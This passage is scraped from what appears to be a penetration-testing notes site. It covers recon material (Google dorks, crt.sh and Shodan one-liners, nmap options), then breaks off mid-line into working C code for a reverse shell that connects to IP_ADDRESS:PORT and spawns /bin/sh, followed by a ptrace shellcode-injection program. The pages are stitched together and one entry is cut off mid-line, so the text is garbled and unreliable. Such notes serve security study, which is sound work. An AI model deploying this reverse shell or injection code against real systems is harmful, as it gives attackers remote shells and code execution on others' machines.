\[8.Sudo-rights-abuse\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/3.permissions-based-privilege-escalation/8.sudo-rights-abuse.md) - \[9.Privileged-groups\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/3.permissions-based-privilege-escalation/9.privileged-groups.md) - \[4.Service-based Privilege Escalation\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/4.service-based-privilege-escalation.md) - \[11.Vulnerable-services\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/4.service-based-privilege-escalation/11.vulnerable-services.md) - \[12.Cron-job-abuse\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/4.service-based-privilege-escalation/12.cron-job-abuse.md) - \[LXC Privilege Escalation Techniques\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/4.service-based-privilege-escalation/13.-lxd.md) - \[14.-Docker\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/4.service-based-privilege-escalation/14.-docker.md) - \[15.Kubernetes\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/4.service-based-privilege-escalation/15.kubernetes.md) - \[16.Logrotate\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/4.service-based-privilege-escalation/16.logrotate.md) - \[17.Miscellaneous-techniques\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/4.service-based-privilege-escalation/17.miscellaneous-techniques.md) - \[5.Linux Internals-based Privilege Escalation\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/5.linux-internals-based-privilege-escalation.md) - \[18.Kernel-exploits\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/5.linux-internals-based-privilege-escalation/18.kernel-exploits.md) - \[19.Shared-libraries\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/5.linux-internals-based-privilege-escalation/19.shared-libraries.md) - \[20.Shared-object-hijacking\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/5.linux-internals-based-privilege-escalation/20.-shared-object-hijacking.md) - \[21.Python-library-hijacking\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/5.linux-internals-based-privilege-escalation/21.python-library-hijacking.md) - \[6.Recent 0-Days\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/6.recent-0-days.md) - \[22.Sudo\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/6.recent-0-days/22.sudo.md) - \[23.Polkit\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/6.recent-0-days/23.polkit.md) - \[24.Dirty-pipe\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/6.recent-0-days/24.dirty-pipe.md) - \[25.Netfilter\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/linux-privilege-escalation/6.recent-0-days/25.netfilter.md) - \[Windows Privilege Escalation\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation.md) - \[Priv-Esc\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/priv-esc.md) - \[1.Getting the Lay of the Land\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/1.getting-the-lay-of-the-land.md) - \[1.Situational-awareness\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/1.getting-the-lay-of-the-land/1.situational-awareness.md) - \[2.Initial-enumeration\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/1.getting-the-lay-of-the-land/2.initial-enumeration.md) - \[3.Communication-with-processes\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/1.getting-the-lay-of-the-land/3.communication-with-processes.md) - \[2.Windows User Privileges\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/2.windows-user-privileges.md) - \[4.windows-privileges-overview\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/2.windows-user-privileges/4.windows-privileges-overview.md) - \[5.Seimpersonate-and-seassignprimarytoken\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/2.windows-user-privileges/5.seimpersonate-and-seassignprimarytoken.md) - \[6.Sedebugprivilege\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/2.windows-user-privileges/6.-sedebugprivilege.md) - \[Exploiting SeTakeOwnershipPrivilege\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/2.windows-user-privileges/7.-setakeownershipprivilege.md) - \[3.Windows Group Privileges\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/3.windows-group-privileges.md) - \[10.DNSadmins\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/3.windows-group-privileges/10.dnsadmins.md) - \[11.Hyper-v-administrators\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/3.windows-group-privileges/11.-hyper-v-administrators.md) - \[Key Concepts:\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/3.windows-group-privileges/12.-print-operators.md) - \[Key Concepts:\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/3.windows-group-privileges/13.server-operators.md) - \[8.Windows-built-in-groups\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/3.windows-group-privileges/8.-windows-built-in-groups.md) - \[Exploiting Event Log Readers Group for Security Log Access\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/3.windows-group-privileges/9.event-log-readers.md) - \[4.Attacking the OS\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/4.attacking-the-os.md) - \[14.User-account-control\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/4.attacking-the-os/14.user-account-control.md) - \[15.Weak-permissions\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/4.attacking-the-os/15.weak-permissions.md) - \[16.Kernel-exploits\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/4.attacking-the-os/16.kernel-exploits.md) - \[17.Vulnerable-services\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/4.attacking-the-os/17.vulnerable-services.md) - \[18.DLL-injection\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/4.attacking-the-os/18.dll-injection.md) - \[5.Credential Theft\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/5.credential-theft.md) - \[19.Credential-hunting\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/5.credential-theft/19.credential-hunting.md) - \[20.Other-files\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/5.credential-theft/20.-other-files.md) - \[21.Further-credential-theft\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/5.credential-theft/21.further-credential-theft.md) - \[6.Restricted Environments\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/6.restricted-environments.md) - \[22.-Citrix-breakout\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/6.restricted-environments/22.-citrix-breakout.md) - \[7.Additional Techniques\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/7.additional-techniques.md) - \[23.Interacting-with-users\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/7.additional-techniques/23.-interacting-with-users.md) - \[24.Pillaging\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/7.additional-techniques/24.pillaging.md) - \[25.Miscellaneous-techniques\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/7.additional-techniques/25.miscellaneous-techniques.md) - \[8.Dealing with End of Life Systems\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/8.dealing-with-end-of-life-systems.md) - \[Key Points:\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/8.dealing-with-end-of-life-systems/26.-legacy-operating-systems.md) - \[27.windows-server\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/8.dealing-with-end-of-life-systems/27.windows-server.md) - \[28.windows-desktop-versions\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/windows-privilege-escalation/8.dealing-with-end-of-life-systems/28.windows-desktop-versions.md) - \[Server-side Attacks\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/server-side-attacks.md) - \[Server-side-vulnerabilities\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/server-side-attacks/server-side-vulnerabilities.md) - \[Web Attacks\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/web-attacks.md) - \[1.-HTTP-verb-tampering\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/web-attacks/1.-http-verb-tampering.md) - \[2.-Insecure-direct-object-references-idor\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/web-attacks/2.-insecure-direct-object-references-idor.md) - \[3.-XML-external-entity-xxe-injection\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/web-attacks/3.-xml-external-entity-xxe-injection.md) - \[Web-attacks-to-the-point\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/web-attacks/web-attacks-to-the-point.md) - \[Web Service & API Attacks\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/web-service-and-api-attacks.md) - \[web-service-and-api-attacks\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/web-service-and-api-attacks/web-service-and-api-attacks.md) - \[Command-injections\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/command-injections.md) - \[SQL-injection\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/sql-injection.md) - \[XSS\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/xss.md) - \[XSS-based Session Hijacking\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/xss/xss-based-session-hijacking.md) - \[Broken Authentication\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/broken-authentication.md) - \[Login-brute-forcing\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/login-brute-forcing.md) - \[Password-attacks\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/password-attacks.md) - \[Password-cracking\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/password-cracking.md) - \[Session Security Guide\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/session-security.md) - \[File-transfer\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-transfer.md) - \[File-upload-attacks\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-upload-attacks.md) - \[Shells and payloads\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/shells-and-payloads.md) - \[Upgrading-tty-shell\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/upgrading-tty-shell.md) - \[Using-the-metasploit-framework\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/using-the-metasploit-framework.md) - \[File Inclusion\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion.md) - \[1.File Disclosure\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/1.file-disclosure.md) - \[1.Local-file-inclusion-lfi\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/1.file-disclosure/1.local-file-inclusion-lfi.md) - \[2.Basic-bypasses\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/1.file-disclosure/2.-basic-bypasses.md) - \[3.PHP-filters\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/1.file-disclosure/3.-php-filters.md) - \[2.Remote Code Execution\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/2.remote-code-execution.md) - \[4.PHP-wrappers\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/2.remote-code-execution/4.-php-wrappers.md) - \[5.Remote-file-inclusion-rfi\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/2.remote-code-execution/5.-remote-file-inclusion-rfi.md) - \[6.LFI-and-file-uploads\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/2.remote-code-execution/6.-lfi-and-file-uploads.md) - \[7.LOG-poisoning\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/2.remote-code-execution/7.-log-poisoning.md) - \[3.Automation and Prevention\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/3.automation-and-prevention.md) - \[8.Automated-scanning\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/3.automation-and-prevention/8.-automated-scanning.md) - \[9.File-inclusion-prevention\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/file-inclusion/3.automation-and-prevention/9.-file-inclusion-prevention.md) - \[Ligolo-ng\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/ligolo-ng.md) - \[Pivoting-tunneling-and-port-forwarding\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/pivoting-tunneling-and-port-forwarding.md) - \[TIPS\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/cpts-tips.md) - \[CheatSheet\](https://x3m1sec.gitbook.io/notes/my-certifications/cpts/notes/cheatsheet.md) - \[OSCP\](https://x3m1sec.gitbook.io/notes/my-certifications/oscp.md) - \[Preparation\](https://x3m1sec.gitbook.io/notes/my-certifications/oscp/oscp-preparation.md) - \[Cheatsheets\](https://x3m1sec.gitbook.io/notes/my-certifications/oscp/cheatsheets.md) - \[Resources\](https://x3m1sec.gitbook.io/notes/resources.md) - \[Cheat Sheets\](https://x3m1sec.gitbook.io/notes/resources/cheat-sheets.md) - \[Reverse shells\](https://x3m1sec.gitbook.io/notes/resources/cheat-sheets/rev-shells.md) - \[Default Passwords\](https://x3m1sec.gitbook.io/notes/resources/cheat-sheets/default-passwords.md) - \[Kerberoast\](https://x3m1sec.gitbook.io/notes/resources/cheat-sheets/kerberoast.md) - \[Mimikatz\](https://x3m1sec.gitbook.io/notes/resources/cheat-sheets/mimikatz.md) - \[Powerup\](https://x3m1sec.gitbook.io/notes/resources/cheat-sheets/powerup.md) - \[Hashcat Word lists and Rules\](https://x3m1sec.gitbook.io/notes/resources/cheat-sheets/hashcat-word-lists-and-rules.md) - \[Metasploit Modules\](https://x3m1sec.gitbook.io/notes/resources/cheat-sheets/metasploit-modules.md) - \[Misc Snippets\](https://x3m1sec.gitbook.io/notes/resources/cheat-sheets/misc-snippets.md) --- # Protocols and Services | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services.md) . [DNS Port (53)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-53-dns) [FTP Port (21)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-21-or-ftp) [IMAP Ports (143,993)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-143-993-imap) [IPMI Port (623)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-623-ipmi) [Kerberos Port (88)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-88-or-kerberos) [MSSQL Port (1433)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-1433-mssql) [MySQL Port (3306)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-3306-mysql) [NFS Ports (111,2049)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-2049-nfs) [NetBIOS Ports (137,138,139)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-137-or-138-or-139-or-netbios) [Oracle TNS Port (1521)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/oracle-tns-port-1521) [POP3 Port (110)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/pop3-port-110) [PostgreSQL Port (5432)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-5432-postgres) [RDP Port (3389)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-3389-or-rdp) [SMB Ports (139,445)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-139-445-smb) [SMTP Port (25)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/25-smtp) [SNMP Ports (161,162)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-161-162-snmp) [Java RMI Port (1099)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-1099-or-java-rmi) [LDAP Ports (389,636)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-389-636-ldap) [Apache Tomcat Ports (8080,8180)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-8080-8180-apache-tomcat) [Port 123 - NTP](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-123-or-ntp) [RPCBind Ports (111,32771)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/ports-111-or-32771-or-rpcbind) [Email Services](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/email-services) [Nmap Commands for Port Discovery](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/nmap-commands-for-port-discovery) [PreviousInformation Gathering](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering) [NextDNS Port (53)](https://x3m1sec.gitbook.io/notes/pentest-notes/protocols-and-services/port-53-dns) Last updated 1 year ago --- # Information Gathering | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering.md) . **Passive Information Gathering & OSINT**[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#passive-information-gathering-and-osint) ---------------------------------------------------------------------------------------------------------------------------------------------------------- * These techniques refer to gaining information from publicly available sources * By doing so, the attacker gains information about the target, without any type of active scanning * This ensures that the target will never be aware that we are obtaining information about it, since there is no form of direct interaction External Resources: 1. [https://www.cheatsheet.wtf/OSINT/](https://www.cheatsheet.wtf/OSINT/) 2. [https://www.compass-security.com/fileadmin/Research/White\_Papers/2017-01\_osint\_cheat\_sheet.pdf](https://www.compass-security.com/fileadmin/Research/White_Papers/2017-01_osint_cheat_sheet.pdf) 3. [https://bigdata-ir.com/wp-content/uploads/2021/02/OSINT\_Packet\_2019.pdf](https://bigdata-ir.com/wp-content/uploads/2021/02/OSINT_Packet_2019.pdf) * * * ### Google Dorks[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#google-dorks) Google can be a powerful tool for penetration testing and bug-bounty hunting. Google's crawling capabilities can help us find exposed files, scripts and other critical resources in web applications. This [blogpost](https://www.freecodecamp.org/news/google-dorking-for-pentesters-a-practical-tutorial/) can be useful if you need to learn more about google dorks. You can also refer to the following: * [https://www.exploit-db.com/google-hacking-database](https://www.exploit-db.com/google-hacking-database) * [https://pentest-tools.com/information-gathering/google-hacking](https://pentest-tools.com/information-gathering/google-hacking) Generic Queries[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#generic-queries) `site:*.target.com intext:uncaught` `site:*.target.com intext:error` `site:*.target.com intext:parameter` `site:*.target.com intext:missing` `site:*.target.com intext:"stack trace"` `site:*.target.com intext:php` `site:*.target.com intext:jsp` `site:*.target.com intext:asp` `site:*.target.com intext:include_path` `site:*.target.com intext:undefined` `site:*.target.com intext:sql` `site:*.target.com intext:invalid` `site:*.target.com intext:exception` `site:*.target.com intext:fatal` `site:*.target.com intext:CONFIG` `site:*.target.com intext:login` `site:*.target.com intitle:"index of"` `site:*.target.com inurl:prod` `site:*.target.com inurl:&` `site:*.target.com inurl:dev` `site:*.target.com inurl:staging` `site:*.target.com inurl:stg` `site:*.target.com inurl:debug` `site:*.target.com inurl:admin` `site:*.target.com inurl:internal` Apache Services[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#apache-services) `site:*.target.com intitle:"apache tomcat/"` `site:*.target.com "Apache Tomcat examples"` `site:*.target.com intext:"apache"` `site:*.target.com intitle:"Solr Admin"` `site:*.target.com intext:"This is the default welcome page used to test the correct operation of the Apache2 server"` `site:*.target.com intitle:"index of" "powered by apache "` `site:*.target.com intext:"Apache server status for"` `site:*.target.com intitle:"Apache2 Ubuntu Default Page: It works"` `site:*.target.com intitle:"WAMPSERVER homepage" "Server Configuration" "Apache Version"` `site:*.target.com intitle:"Test Page for the Apache HTTP Server"` Files[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#files) `site:*.target.com ext:txt` `site:*.target.com ext:php` `site:*.target.com ext:php5` `site:*.target.com ext:phtml` `site:*.target.com ext:xhtml` `site:*.target.com ext:key` `site:*.target.com ext:pem` `site:*.target.com ext:ovpn` `site:*.target.com ext:log` `site:*.target.com ext:asp` `site:*.target.com ext:aspx` `site:*.target.com ext:jsp` `site:*.target.com ext:dat` `site:*.target.com ext:ovpn` `site:*.target.com ext:yml` `site:*.target.com ext:bak` `site:*.target.com ext:zip` `site:*.target.com ext:yaml` `site:*.target.com ext:json` `site:*.target.com ext:xml` `site:*.target.com ext:env` `site:*.target.com ext:conf` `site:*.target.com ext:ini` `site:*.target.com ext:cfg` `site:*.target.com ext:cgi` `site:*.target.com ext:ccm` `site:*.target.com ext:sql` `site:*.target.com ext:cdx` `site:*.target.com ext:ics` GraphQL queries[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#graphql-queries) `site:*.target.com intext:"GRAPHQL_PARSE_FAILED"` `site:*.target.com intext:"GRAPHQL_VALIDATION_FAILED"` `site:*.target.com intext:"BAD_USER_INPUT"` `site:*.target.com intext:"UNAUTHENTICATED"` `site:*.target.com intext:"FORBIDDEN"` `site:*.target.com intext:"PERSISTED_QUERY_NOT_FOUND"` `site:*.target.com intext:"PERSISTED_QUERY_NOT_SUPPORTED"` `site:*.target.com intext:"INTERNAL_SERVER_ERROR"` * * * ### **Domain Information using Crt.sh & Shodan**[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#domain-information-using-crt.sh-and-shodan) 1. Output and Download JSON: `curl -s https://crt.sh/\?q\=test.com\&output\=json | jq .` 2. Filter JSON by subdomains: `curl -s https://crt.sh/\?q\=test.com\&output\=json | jq . | grep name | cut -d":" -f2 | grep -v "CN=" | cut -d'"' -f2 | awk '{gsub(/\\n/,"\n");}1;' | sort -u` 3. Make an ip-address wordlist: `for i in $(cat subdomainlist);do host $i | grep "has address" | grep [test.com](http://test.com/) | cut -d" " -f4 >> ip-addresses.txt;done` 4. Run shodan on those ip addresses: `for i in $(cat ip-addresses.txt);do shodan host $i;done` * * * ### **Passive Domain Enumeration**[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#passive-domain-enumeration) Resource/Command Description VirusTotal https://www.virustotal.com/gui/home/url Censys https://censys.io/ Crt.sh https://crt.sh/ curl -s https://sonar.omnisint.io/subdomains/{domain} | jq -r '.\[\]' | sort -u All subdomains for a given domain. curl -s https://sonar.omnisint.io/tlds/{domain} | jq -r '.\[\]' | sort -u All TLDs found for a given domain. curl -s https://sonar.omnisint.io/all/{domain} | jq -r '.\[\]' | sort -u All results across all TLDs for a given domain. curl -s https://sonar.omnisint.io/reverse/{ip} | jq -r '.\[\]' | sort -u Reverse DNS lookup on IP address. curl -s https://sonar.omnisint.io/reverse/{ip}/{mask} | jq -r '.\[\]' | sort -u Reverse DNS lookup of a CIDR range. curl -s "https://crt.sh/?q=${TARGET}&output=json" | jq -r '.\[\] | "(.name\_value)\\n(.common\_name)"' | sort -u Certificate Transparency. cat sources.txt | while read source; do theHarvester -d "${TARGET}" -b $source -f "${source}-${TARGET}";done Searching for subdomains and other information on the sources provided in the source.txt list. https://searchdns.netcraft.com/ Search public information about a hostname using netcraft * * * ### **Passive Infrastructure Identification**[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#passive-infrastructure-identification) Resource/Command Description Netcraft https://www.netcraft.com/ WayBackMachine http://web.archive.org/ WayBackURLs https://github.com/tomnomnom/waybackurls waybackurls -dates https://$TARGET > waybackurls.txt Crawling URLs from a domain with the date it was obtained. * * * **Active Information Gathering**[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#active-information-gathering) -------------------------------------------------------------------------------------------------------------------------------------- * By using active scans against the target, we can gain more (reliable) information about it * Whenever we are executing external scans, nmap and many other different tools can help us gain a lay of the land of the target surface * * * ### **Protocols and Services Footprinting with NMAP**[](https://x3m1sec.gitbook.io/notes/pentest-notes/information-gathering#protocols-and-services-footprinting-with-nmap) * Scanning a target with nmap may reveal services, open ports, service versions, operating system and so on * After gaining a lay of the land of the protocols and services granted by the target, refer to the Protocols and Services Notes for more information * * * **NMAP Scanning Options** Nmap Option Description `10.10.10.0/24` Target network range. `-sn` Disables port scanning. `-Pn` Disables ICMP Echo Requests `-n` Disables DNS Resolution. `-PE` Performs the ping scan by using ICMP Echo Requests against the target. `--packet-trace` Shows all packets sent and received. `--reason` Displays the reason for a specific result. `--disable-arp-ping` Disables ARP Ping Requests. `--top-ports=` Scans the specified top ports that have been defined as most frequent. `-p-` Scan all ports. `-p22-110` Scan all ports between 22 and 110. `-p22,25` Scans only the specified ports 22 and 25. `-F` Scans top 100 ports. `-sS` Performs an TCP SYN-Scan. `-sA` Performs an TCP ACK-Scan. Note: best for firewall and ids/ips evasion `-sU` Performs an UDP Scan. `-sV` Scans the discovered services for their versions. `-sC` Perform a Script Scan with scripts that are categorized as "default". `-sL` List Scan - simply list targets to scan - useful to understand which targets are reachable `--script awen asp.net webshell
Command:
Copy #include #include #include #include int main (int argc, char **argv) { int scktd; struct sockaddr_in client; client.sin_family = AF_INET; client.sin_addr.s_addr = inet_addr("IP_ADDRESS"); client.sin_port = htons(PORT); scktd = socket(AF_INET,SOCK_STREAM,0); connect(scktd,(struct sockaddr *)&client,sizeof(client)); dup2(scktd,0); // STDIN dup2(scktd,1); // STDOUT dup2(scktd,2); // STDERR execl("/bin/sh","sh","-i",NULL,NULL); return 0; } Copy #include #include #include #include #include #include #include #include #include #include #define SHELLCODE_SIZE 32 unsigned char *shellcode = "\x48\x31\xc0\x48\x89\xc2\x48\x89" "\xc6\x48\x8d\x3d\x04\x00\x00\x00" "\x04\x3b\x0f\x05\x2f\x62\x69\x6e" "\x2f\x73\x68\x00\xcc\x90\x90\x90"; int inject_data (pid_t pid, unsigned char *src, void *dst, int len) { int i; uint32_t *s = (uint32_t *) src; uint32_t *d = (uint32_t *) dst; for (i = 0; i < len; i+=4, s++, d++) { if ((ptrace (PTRACE_POKETEXT, pid, d, *s)) < 0) { perror ("ptrace(POKETEXT):"); return -1; } } return 0; } int main (int argc, char *argv[]) { pid_t target; struct user_regs_struct regs; int syscall; long dst; if (argc != 2) { fprintf (stderr, "Usage:\n\t%s pid\n", argv[0]); exit (1); } target = atoi (argv[1]); printf ("+ Tracing process %d\n", target); if ((ptrace (PTRACE_ATTACH, target, NULL, NULL)) < 0) { perror ("ptrace(ATTACH):"); exit (1); } printf ("+ Waiting for process...\n"); wait (NULL); printf ("+ Getting Registers\n"); if ((ptrace (PTRACE_GETREGS, target, NULL, ®s)) < 0) { perror ("ptrace(GETREGS):"); exit (1); } /* Inject code into current RPI position */ printf ("+ Injecting shell code at %p\n", (void*)regs.rip); inject_data (target, shellcode, (void*)regs.rip, SHELLCODE_SIZE); regs.rip += 2; printf ("+ Setting instruction pointer to %p\n", (void*)regs.rip); if ((ptrace (PTRACE_SETREGS, target, NULL, ®s)) < 0) { perror ("ptrace(GETREGS):"); exit (1); } printf ("+ Run it!\n"); if ((ptrace (PTRACE_DETACH, target, NULL, NULL)) < 0) { perror ("ptrace(DETACH):"); exit (1); } return 0; } --- # OS Command Injection | Pentest Notes For the complete documentation index, see [llms.txt](https://x3m1sec.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection.md) . **Introduction**[](https://x3m1sec.gitbook.io/notes/pentest-notes/web-applications/web-attacks/os-command-injection#introduction) ---------------------------------------------------------------------------------------------------------------------------------- > * Injection vulnerabilities are considered the number 3 risk in OWASP's Top 10 Web App Risks, given their high impact and how common they are. > > * Injection occurs when user-controlled input is misinterpreted as part of the web query or code being executed, which may lead to subverting the intended outcome of the query to a different outcome that is useful to the attacker. > > * When it comes to OS Command Injections, the user input we control must directly or indirectly go into (or somehow affect) a web query that executes system commands. > * * * **OS Command Injection 